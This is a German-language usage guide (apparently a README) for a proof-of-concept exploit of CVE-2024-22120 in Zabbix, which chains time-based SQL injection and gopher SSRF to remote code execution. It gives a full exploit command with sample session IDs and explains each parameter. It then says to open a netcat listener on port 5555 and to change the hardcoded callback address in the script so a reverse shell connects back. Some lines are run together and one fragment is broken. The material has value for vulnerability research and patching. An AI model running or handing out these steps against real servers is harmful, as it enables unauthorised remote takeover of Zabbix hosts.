
Proof-of-concept-Exploit für CVE-2024-22120, der zeitbasierte SQL-Injection und Gopher-basierte SSRF ausnutzt, um Remote-Code-Ausführung auf verwundbaren Zabbix-Servern zu erreichen – für Bildungszwecke in der Sicherheitsforschung.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Sie haben einen Zabbix-Server identifiziert, der auf der IP 192.168.1.100 läuft, und Sie haben Zugriff auf einen Benutzer mit niedrigen Rechten mit den folgenden Details:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gSie möchten die RCE-Schwachstelle mit diesem Skript ausnutzen.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: Die IP-Adresse des Zabbix-Servers.--sid d82bf6715e1d3c1f25: Die Sitzungs-ID eines Benutzers mit niedrigen Rechten.--hostid 10107: Die ID eines Hosts, auf den der Benutzer mit niedrigen Rechten zugreifen kann.--phpsessid a4g7f48d9j3r7h8s9g: Die PHP-Sitzungs-ID, die zur Authentifizierung von Anfragen verwendet wird.--false_time 1: Zeit in Sekunden, die bei einer falschen Vermutung während der SQL-Injektion gewartet wird (Standard ist 1 Sekunde).--true_time 3: Zeit in Sekunden, die bei einer richtigen Vermutung während der SQL-Injektion gewartet wird (Standard ist 3 Sekunden).10.0.46.27:5555 im Skript).Stellen Sie sicher, dass Ihre Maschine auf dem angegebenen Port lauscht (5555 im Skript), um die Reverse-Shell zu empfangen. Sie können dafür netcat verwenden:
nc -lvnp 5555
Ersetzen Sie die IP 10.0.46.27 und den Port 5555 in der Funktion CreateScript durch Ihre eigene IP und den gewünschten Port, um die Reverse-Shell zu empfangen.